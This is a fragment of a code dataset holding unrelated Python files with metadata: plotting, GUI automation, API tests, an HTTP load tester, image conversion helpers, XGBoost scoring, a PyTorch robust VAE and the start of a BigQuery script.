['blue', 'red', 'black', 'green', 'pink', 'yellow', 'brown', 'magenta', 'cyan', 'orange'])\n if n_components == 2:\n plt.scatter(transformed_states[:, 0], transformed_states[:, 1], c=colors)\n elif n_components == 3:\n fig = plt.figure(1, figsize=(4, 3))\n ax = Axes3D(fig, rect=[0, 0, .95, 1], elev=48, azim=134)\n ax.scatter(transformed_states[:, 0], transformed_states[:, 1], transformed_states[:, 2], c=colors)\n\n plt.show()\n\n\nif __name__ == '__main__':\n print('Loading')\n df = 
pickle.load(open('/home/petrbel/Dropbox/ALI/states.pkl', 'rb'))\n pca(states=list(df['states']), labels=list(df['labels']), n_components=2, plot_by_colors=True)\n # pca(states=list(df['states']), labels=list(df['labels']), n_components=3)\n # tsne(states=list(df['states']), labels=list(df['labels']), n_components=2)\n # tsne(states=list(df['states']), labels=list(df['labels']), n_components=3)\n print('Finished')\n", "sub_path": "visual.py", "file_name": "visual.py", "file_ext": "py", "file_size_in_byte": 3103, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sklearn.decomposition.PCA", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.choose", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "mpl_toolkits.axes_grid1.ImageGrid", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "itertools.compress", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "mpl_toolkits.mplot3d.Axes3D", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "numpy.choose", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "mpl_toolkits.mplot3d.Axes3D", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "cPickle.load", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "61919113", "text": "import pyautogui\r\nimport time\r\nfrom selenium import webdriver\r\n\r\n#define the image-recognition double-click event\r\ndef mouseDoubleClick(image):\r\n x,y=pyautogui.locateCenterOnScreen(image,confidence=0.9)\r\n pyautogui.click(x,y,clicks=2,interval=0.2,duration=0.2,button='left')\r\n\r\n#define the single-click event\r\ndef mouseClick(image):\r\n x,y=pyautogui.locateCenterOnScreen(image,confidence=0.9)\r\n pyautogui.click(x,y,clicks=1,interval=0.2,duration=0.2,button='left')\r\n\r\nmouseDoubleClick(image = 
'chorm.png')\r\n\r\npyautogui.write(\"www.baidu.com\")\r\ntime.sleep(1)\r\npyautogui.press(\"enter\")\r\ntime.sleep(3)\r\n\r\npyautogui.write(\"Detroit: Become Human\")\r\ntime.sleep(2)\r\npyautogui.press(\"enter\")\r\n", "sub_path": "students/Siyang Liu/pyaotugui/pyautogui_serch.py", "file_name": "pyautogui_serch.py", "file_ext": "py", "file_size_in_byte": 667, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pyautogui.locateCenterOnScreen", "line_number": 7, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 8, "usage_type": "call"}, {"api_name": "pyautogui.locateCenterOnScreen", "line_number": 12, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 13, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 18, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 19, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 22, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "115663981", "text": "from tastypie.test import ResourceTestCase\nfrom projects.tests.factories import ProjectFactory\nfrom tools.mongo import MongoFlushMixin\nfrom .. import models\n\n\nclass BaseTaskResourceCase(MongoFlushMixin, ResourceTestCase):\n \"\"\"Base task resource case\"\"\"\n mongo_flush = ['tasks']\n\n def setUp(self):\n MongoFlushMixin.setUp(self)\n ResourceTestCase.setUp(self)\n\n ProjectFactory(name='test', is_enabled=True)\n\n\nclass RawTaskResourceCase(BaseTaskResourceCase):\n \"\"\"Create task case\"\"\"\n\n def setUp(self):\n super(RawTaskResourceCase, self).setUp()\n self.url = '/api/v1/tasks/raw/'\n\n def test_create_on_post(self):\n \"\"\"Test create on post\"\"\"\n self.api_client.post(self.url, data={\n 'service': {\n 'name': 'dummy',\n },\n 'project': 'test',\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [\n {'name': 'dummy', 'raw': '1'},\n ]\n })\n self.assertEqual(1, models.Tasks.count())\n\n def test_error_on_wrong_service(self):\n \"\"\"Test error on wrong service\"\"\"\n response = self.api_client.post(self.url, data={\n 'service': {\n 'name': 'dummy!!!',\n },\n 'project': 'test',\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [\n {'name': 'dummy', 'raw': '1'},\n ]\n })\n self.assertEqual(response.status_code, 404)\n\n def test_error_on_wrong_project(self):\n \"\"\"Test error on wrong project\"\"\"\n response = self.api_client.post(self.url, data={\n 'service': {\n 'name': 'dummy',\n },\n 'project': 'test!!',\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [\n {'name': 'dummy', 'raw': '1'},\n ]\n })\n self.assertEqual(response.status_code, 404)\n\n\nclass TaskResourceCase(BaseTaskResourceCase):\n \"\"\"Get tasks resource case\"\"\"\n\n def setUp(self):\n super(TaskResourceCase, self).setUp()\n self.url = '/api/v1/tasks/task/'\n\n def _create_tasks(self, project='test', count=20):\n \"\"\"Create tasks\"\"\"\n models.Tasks.insert([{\n 'service': {\n 'name': 'dummy',\n },\n 'project': project,\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [{\n 'name': 'dummy',\n 
'raw': '1',\n 'status': 1,\n 'prepared': '123{}'.format(n),\n }]\n } for n in range(count)])\n\n def test_get_all(self):\n \"\"\"Test get all\"\"\"\n self._create_tasks()\n response = self.api_client.get(self.url)\n data = self.deserialize(response)\n self.assertEqual(data['meta']['total_count'], 20)\n self.assertIsNone(data['objects'][0]['violations'])\n\n def test_get_all_with_violations(self):\n \"\"\"Test get all with violations\"\"\"\n self._create_tasks()\n response = self.api_client.get('{}?with_violations=1'.format(self.url))\n data = self.deserialize(response)\n self.assert_(data['objects'][0]['violations'][0]['name'])\n self.assert_(data['objects'][0]['violations'][0]['status'])\n\n def test_get_with_full_violations(self):\n \"\"\"Test get with full violations\"\"\"\n self._create_tasks()\n response = self.api_client.get(\n '{}?with_full_violations=1'.format(self.url),\n )\n data = self.deserialize(response)\n self.assert_(data['objects'][0]['violations'][0]['raw'])\n self.assert_(data['objects'][0]['violations'][0]['prepared'])\n\n def test_filter_by_project(self):\n \"\"\"Test filter by project\"\"\"\n self._create_tasks('test', 5)\n self._create_tasks('nope', 10)\n response = self.api_client.get('{}?project=test'.format(self.url))\n data = self.deserialize(response)\n self.assertEqual(data['meta']['total_count'], 5)\n", "sub_path": "tasks/tests/test_resources.py", "file_name": "test_resources.py", "file_ext": "py", "file_size_in_byte": 4398, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tools.mongo.MongoFlushMixin", "line_number": 7, "usage_type": "name"}, {"api_name": "tastypie.test.ResourceTestCase", "line_number": 7, "usage_type": "name"}, {"api_name": "tools.mongo.MongoFlushMixin.setUp", "line_number": 12, "usage_type": "call"}, {"api_name": "tools.mongo.MongoFlushMixin", "line_number": 12, "usage_type": "name"}, {"api_name": "tastypie.test.ResourceTestCase.setUp", "line_number": 13, "usage_type": "call"}, {"api_name": "tastypie.test.ResourceTestCase", "line_number": 13, "usage_type": "name"}, {"api_name": "projects.tests.factories.ProjectFactory", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "278185694", "text": "#!/usr/bin/env python3.5\n\n\nimport aiohttp\nimport argparse\nimport asyncio\nimport functools\nimport requests\nimport multiprocessing as mp\nimport time\n\nimport config\nfrom logger import *\n\n\nclass ReusedSession:\n \"\"\" Session for connect to a server. Reuse after return a response (for keep-alive)\n Parameters:\n session (aiohttp.ClientSession): session for connect\n working (bool): flag shows the session does not have work for server \n \"\"\"\n def __init__(self):\n self.session = aiohttp.ClientSession()\n self.working = False\n self.failed = False\n\n\ndef get_free_session(sessions, loggers):\n \"\"\" Find not working session for assign new work. 
Create new one if no available sessions\n Args:\n sessions (list)\n sessions.item (ReusedSession)\n Returns:\n ReusedSession\n \"\"\"\n LOG, LOG_ERR = loggers\n\n failed_session_num = []\n free_session = None\n for i, s in enumerate(sessions):\n if s.failed:\n failed_session_num.append(i)\n continue\n\n if not s.working:\n free_session = s\n break\n\n # Reverse sort for correct delete in array - index out of range\n failed_session_num = sorted(failed_session_num, reverse=True)\n for i in failed_session_num:\n #LOG.put( LogMsg(LN.err.FAIL_SESSION, time.time()) )\n sessions[i].session.close()\n del sessions[i]\n\n if free_session is not None:\n return free_session\n\n s = ReusedSession()\n sessions.append(s)\n #LOG.put( LogMsg(LN.info.NEW_SESSION, time.time()) )\n\n return s\n\n\ndef free_session(session, *args):\n \"\"\" Returns for session opportunity reused\n Args:\n session (ReusedSession)\n Returns:\n void\n \"\"\"\n session.working = False\n\n\nasync def request(host, port, path, session, loggers):\n \"\"\" Requests server and wait response \n Args:\n session (ReusedSession)\n Returns:\n void\n \"\"\"\n LOG, LOG_ERR = loggers\n\n request_url = \"http://\" + host + \":\" + port + path\n\n try:\n async with aiohttp.client._RequestContextManager(session.session._request(aiohttp.hdrs.METH_GET, request_url)) as resp:\n #LOG.put( LogMsg(LN.info.REQUEST, time.time()) )\n await resp.text()\n asyncio.sleep(1)\n except Exception as err:\n #LOG_ERR.put( LogMsg(LN.err.REQUEST, time.time()) )\n session.failed = True\n asyncio.sleep(1)\n\n\ndef calc_rate(time_since_start, limit_rate):\n \"\"\" Suppose we need reach `limit_rate` in some time\n Args:\n time_since_start (int): num of seconds since start\n limit_rate (int): max rate for perfomance test\n Returns:\n curr_rate (int): rate for current time\n \"\"\"\n init_rate = config.INIT_RATE\n step_rate = config.STEP_RATE\n\n rate = init_rate + time_since_start * step_rate\n\n return [round(rate), limit_rate][rate > limit_rate]\n\n\nasync def schedule_send_requests(loop, host, port, path, rate, loggers):\n \"\"\" Schedule envoke send_requests with calculated rate every second\n Args:\n loop (asyncio.BaseEventLoop)\n host (str)\n port (str)\n rate (int)\n Returns:\n void\n \"\"\"\n reused_sessions = []\n it_num = -1\n \n while True:\n it_num += 1\n\n curr_rate = calc_rate(it_num, rate)\n task = loop.create_task( send_requests(loop=loop, host=host, port=port, path=path, rate=curr_rate, sessions=reused_sessions, loggers=loggers) )\n await asyncio.sleep(1)\n\n\nasync def send_requests(loop, host, port, path, rate, sessions, loggers):\n \"\"\" Sent requests for server 'host:port' with specified rate (rps)\n Args:\n loop (asyncio.BaseEventLoop)\n host (str)\n port (str)\n rate (int)\n Returns:\n void\n \"\"\"\n for i in range(rate):\n session = get_free_session(sessions, loggers)\n session.working = True\n task = loop.create_task( request(host, port, path, session, loggers) )\n task.add_done_callback( functools.partial(free_session, session) )\n\n\ndef load(host, port, path, rate, loggers):\n loop = asyncio.get_event_loop()\n loop.run_until_complete(\n schedule_send_requests(loop=loop, host=host, port=port, path=path, rate=rate, loggers=loggers))\n loop.close()\n\n\ndef parse_cmd():\n # for load simple nginx with sleep 1sec - the max for localhost 6processes x40 rate\n # beyond can't guarantee to maintain the level of rate (limit at cpu)\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--rate\", type=int, required=True)\n 
parser.add_argument(\"--host\", type=str, required=True)\n parser.add_argument(\"--port\", type=str, required=True)\n parser.add_argument(\"--path\", type=str, required=True)\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_cmd()\n load(args.host, args.port, args.path, args.rate, (None, None))\n", "sub_path": "loader/src/loader.py", "file_name": "loader.py", "file_ext": "py", "file_size_in_byte": 4883, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "aiohttp.ClientSession", "line_number": 23, "usage_type": "call"}, {"api_name": "aiohttp.client._RequestContextManager", "line_number": 88, "usage_type": "call"}, {"api_name": "aiohttp.client", "line_number": 88, "usage_type": "attribute"}, {"api_name": "aiohttp.hdrs", "line_number": 88, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 91, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 95, "usage_type": "call"}, {"api_name": "config.INIT_RATE", "line_number": 106, "usage_type": "attribute"}, {"api_name": "config.STEP_RATE", "line_number": 107, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 132, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 149, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 153, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 162, "usage_type": "call"}]} +{"seq_id": "213947405", "text": "#!/usr/bin/env python\n# encoding=utf8\n#########################################################################\n# Author:\n# Created Time: Thu 08 Nov 2018 08:48:39 PM CST\n# File Name: convert.py\n# Description: tensor pil cv numpy\n#########################################################################\n\nimport cv2\nimport numpy as np\nimport PIL\nimport torch\nfrom torchvision import transforms\n\n# tensor [C, H, W] 取值范围是[0, 1.0] 一般经过normalization\n# pil [H,W,C] 取值范围是[0,255] RGB\n# cv [H,W,C] 取值范围是[0,255] GBR\n\n# pil to numpy\n# np_obj = np.array( pil_obj )\n\n# numpy to pil i\n# pil_obj = PIL.Image.fromarray( np_obj ).convert('RGB')\n\n# tensor => numpy\n# np_obj = tensor.numpy()\n\n# numpy => tensor\n# tensor = torch.Tensor(np_obj)\n\n# pil to cv\n# cv_obj = np.array(pil_img)[:, :, ::-1].copy()\n\n# cv to pil\n# pil_obj = PIL.Image.fromarray(cv_obj.astype('uint8')[:, :, ::-1], mode='RGB')\n\n# tensor to pil\n# pil_img = transforms.ToPILImage()(tensor_obj).convert(\"RGB\")\n# = transpose + *255\n\ndef tensor_to_pil(tensor_img, MEAN=[], STD=[]):\n if MEAN and STD:\n np_img = tensor_img.numpy()\n for i in range(0, 3):\n np_img[i] = np_img[i] * STD[i] + MEAN[i] # unnormalize\n pil_img = transforms.ToPILImage()(torch.from_numpy(np_img)).convert(\"RGB\")\n else:\n pil_img = transforms.ToPILImage()(tensor_img).convert(\"RGB\")\n return pil_img\n\ndef tensor_to_cv(tensor_img, MEAN=[], STD=[]):\n pil_img = tensor_to_pil(tensor_img, MEAN, STD)\n cv_img = np.array(pil_img)[:, :, ::-1].copy()\n return cv_img\n\n\nif __name__ == '__main__':\n\n MEAN = [0.485, 0.456, 0.406]\n STD = [0.229, 0.224, 0.225]\n img_transform = transforms.Compose([transforms.Resize((224, 224)), transforms.ToTensor(), transforms.Normalize(MEAN, STD)])\n pil_img = PIL.Image.open(\"color.jpg\").convert(\"RGB\")\n\n # pil to tensor\n tensor_img = img_transform(pil_img)\n\n pil_img = tensor_to_pil(tensor_img, MEAN, STD)\n pil_img.save(\"pil.jpg\")\n cv_img = np.array(pil_img)[:, :, ::-1].copy()\n 
cv2.imwrite(\"cv.jpg\", cv_img)\n", "sub_path": "mmcv/image/convert.py", "file_name": "convert.py", "file_ext": "py", "file_size_in_byte": 2079, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torchvision.transforms.ToPILImage", "line_number": 47, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 47, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToPILImage", "line_number": 49, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 62, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 62, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 62, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 62, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 62, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "648911782", "text": "from xgboost.sklearn import XGBClassifier as XGBoost\nimport numpy as np\nfrom sklearn.linear_model.logistic import LogisticRegression as LR\nfrom sklearn.metrics import accuracy_score,confusion_matrix,roc_auc_score,matthews_corrcoef\nfrom sklearn.model_selection import StratifiedKFold\ndef scores(y_test,y_pred,th=0.5):\n y_predlabel=[(0 if item max_norm).float() # ).squeeze()\n result_new = result / norm * norm_mask + result * (1 - norm_mask)\n #result[:,norm_mask,:] = result[:,norm_mask,:].div(norm[:,norm_mask,:])\n else:\n result_new = result\n\n # self.last_weight = weight.clone() # NOTE: waste of memory?\n\n return result_new\n\n def to_one_hot(self, input):\n # Returns a new tensor that doesn't share memory\n result = torch.index_select(\n self.ones, 0, input.view(-1).long()).view(\n input.size()+(self.depth,))\n result.requires_grad = self.requires_grad\n return result\n\n def __repr__(self):\n return self.__class__.__name__ + \"({})\".format(self.depth)\n\n \nclass VAE(nn.Module):\n def __init__(self):\n\n super(VAE, self).__init__()\n\n feats = 3\n embedding_size = 50\n layer_size = 400\n latent_size = 5\n\n self.feat_info = [[\"time\",'categ',745],['pulocation','categ',266],['dozone','categ',7],['cnt','real',1]]\n self.size_input = feats*50+1\n self.size_output = feats + 1\n self.alpha = 0.95\n self.gauss = 2\n ## Encoder Params\n\n # define a different embedding matrix for each feature\n self.feat_embedd = nn.ModuleList([nn.Embedding(c_size, embedding_size, max_norm=1)\n for _, col_type, c_size in self.feat_info\n if col_type==\"categ\"])\n\n self.fc1 = nn.Linear(self.size_input, layer_size)\n self.fc21 = nn.Linear(layer_size, latent_size)\n self.fc22 = nn.Linear(layer_size, latent_size)\n\n ## Decoder Params\n\n self.fc3 = nn.Linear(latent_size,layer_size)\n\n self.out_cat_linears = nn.ModuleList([nn.Linear(layer_size, c_size) if col_type==\"categ\"\n else nn.Linear(layer_size, c_size)\n for _, col_type, c_size in self.feat_info])\n\n self.logvar_x = nn.Parameter(torch.zeros(1,1).float())\n\n ## 
Other\n\n self.activ = nn.ReLU()\n\n self.logSoftmax = nn.LogSoftmax(dim=1)\n self.sigmoid = nn.Sigmoid()\n\n # define encoder / decoder easy access parameter list\n encoder_list = [self.fc1, self.fc21, self.fc22]\n self.encoder_mod = nn.ModuleList(encoder_list)\n if self.feat_embedd:\n self.encoder_mod.append(self.feat_embedd)\n\n self.encoder_param_list = nn.ParameterList(self.encoder_mod.parameters())\n\n decoder_list = [self.fc3, self.out_cat_linears]\n self.decoder_mod = nn.ModuleList(decoder_list)\n self.decoder_param_list = nn.ParameterList(self.decoder_mod.parameters())\n if len(self.logvar_x):\n self.decoder_param_list.append(self.logvar_x)\n\n\n def get_inputs(self, x_data):\n input_list = []\n cursor_embed = 0\n start = 0\n \n for feat_idx, ( _, col_type, feat_size ) in enumerate(self.feat_info):\n if col_type == \"categ\":\n aux_categ = self.feat_embedd[cursor_embed](x_data[:,feat_idx].long())#*drop_mask[:,feat_idx].view(-1,1)\n input_list.append(aux_categ)\n cursor_embed += 1\n \n elif col_type == \"real\": \n input_list.append((x_data[:,feat_idx]).view(-1,1).float())#*drop_mask[:,feat_idx]\n \n return torch.cat(input_list, 1)\n\n def encode(self, x_data):\n q_params = dict()\n input_values = self.get_inputs(x_data)\n fc1_out = self.fc1(input_values)\n h1_qz = self.activ(fc1_out)\n q_params['z'] = {'mu': self.fc21(h1_qz), 'logvar': self.fc22(h1_qz)}\n return q_params\n\n def sample_normal(self, q_params_z):\n if self.training:\n eps = torch.randn_like(q_params_z['mu'])\n std = q_params_z['logvar'].mul(0.5).exp_()\n return eps.mul(std).add_(q_params_z['mu'])\n else:\n return q_params_z['mu']\n\n def reparameterize(self, q_params):\n q_samples = dict()\n q_samples['z'] = self.sample_normal(q_params['z'])\n return q_samples\n\n def decode(self, z):\n p_params = dict()\n h3 = self.activ(self.fc3(z))\n out_cat_list = []\n\n for feat_idx, out_cat_layer in enumerate(self.out_cat_linears):\n if self.feat_info[feat_idx][1] == \"categ\": # coltype check\n out_cat_list.append(self.logSoftmax(out_cat_layer(h3)))\n elif self.feat_info[feat_idx][1] == \"real\":\n out_cat_list.append(out_cat_layer(h3))\n\n # tensor with dims (batch_size, self.size_output)\n p_params['x'] = torch.cat(out_cat_list, 1)\n p_params['logvar_x'] = self.logvar_x.clamp(-3,3)\n return p_params\n\n def forward(self, x_data, n_epoch=None):\n q_params = self.encode(x_data)\n q_samples = self.reparameterize(q_params)\n return self.decode(q_samples['z']), q_params, q_samples\n\n def loss_function(self, input_data, p_params, q_params, q_samples, clean_comp_only=False, data_eval_clean=False):\n\n \"\"\" ELBO: reconstruction loss for each variable + KL div losses summed over elements of a batch \"\"\"\n\n dtype_float = torch.cuda.FloatTensor\n nll_val = torch.zeros(1).type(dtype_float)\n # mixed datasets, or just categorical / continuous with medium number of features\n start = 0\n cursor_num_feat = 0\n\n for feat_select, (_, col_type, feat_size) in enumerate(self.feat_info):\n pi_feat = torch.sigmoid(q_params['w']['logit_pi'][:,feat_select]).clamp(1e-6, 1-1e-6)\n \n if clean_comp_only and data_eval_clean:\n pi_feat = torch.ones_like(q_params['w']['logit_pi'][:,feat_select])\n \n # compute NLL\n if col_type == 'categ':\n nll_val += nll_categ_global(p_params['x'][:,start:(start + feat_size)],\n input_data[:,feat_select].long(), feat_size, isRobust=True,\n w=pi_feat, isClean=clean_comp_only).sum()\n start += feat_size\n elif col_type == 'real':\n nll_val += nll_gauss_global(p_params['x'][:,start:(start + 1)], # 2\n 
input_data[:,feat_select],\n p_params['logvar_x'][:,cursor_num_feat], isRobust=True,\n w=pi_feat, isClean=clean_comp_only, \n std_0_scale=self.gauss).sum()\n start += 1 # 2\n cursor_num_feat +=1\n\n\n # kld regularizer on the latent space\n z_kld = -0.5 * torch.sum(1 + q_params['z']['logvar'] - q_params['z']['mu'].pow(2) - q_params['z']['logvar'].exp())\n\n # prior on clean cells (higher values means more likely to be clean)\n prior_sig = torch.tensor(self.alpha).type(dtype_float)\n\n # kld regularized on the weights\n pi_mtx = torch.sigmoid(q_params['w']['logit_pi']).clamp(1e-6, 1-1e-6)\n w_kld = torch.sum(pi_mtx * torch.log(pi_mtx / prior_sig) + (1-pi_mtx) * torch.log((1-pi_mtx) / (1-prior_sig)))\n\n loss_ret = nll_val + z_kld if clean_comp_only else nll_val + z_kld + w_kld\n\n return loss_ret, nll_val, z_kld, w_kld \n\n\n\n \n", "sub_path": "archived/RVAE_org_minimal/RVAE.py", "file_name": "RVAE.py", "file_ext": "py", "file_size_in_byte": 12049, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.functional.nll_loss", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.log", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.eye", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.set_grad_enabled", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 143, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 161, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 165, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 166, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 166, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 167, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 171, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 173, "usage_type": "name"}, {"api_name": "torch.nn.Linear", 
"line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 174, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 181, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 181, "usage_type": "name"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 183, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 184, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 188, "usage_type": "name"}, {"api_name": "torch.nn.ParameterList", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 192, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 195, "usage_type": "name"}, {"api_name": "torch.nn.ParameterList", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 196, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 215, "usage_type": "call"}, {"api_name": "torch.randn_like", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 263, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 264, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 292, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 295, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 298, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 299, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 299, "usage_type": "call"}]} +{"seq_id": "151601083", "text": "## This poc script for converting WIC R code to python\nyour_project_id = \"project-wic_poc\"\nimport pandas as pd\nfrom google.cloud import bigquery\nimport sys\nimport time\n\n## global variables\nprojectId = 'chmdev'\ndbName = 'DATASETCHM2021_D1'\ntableNamePrefix = ''\nmoduleName = ''\nyear = ''\ndbConn = 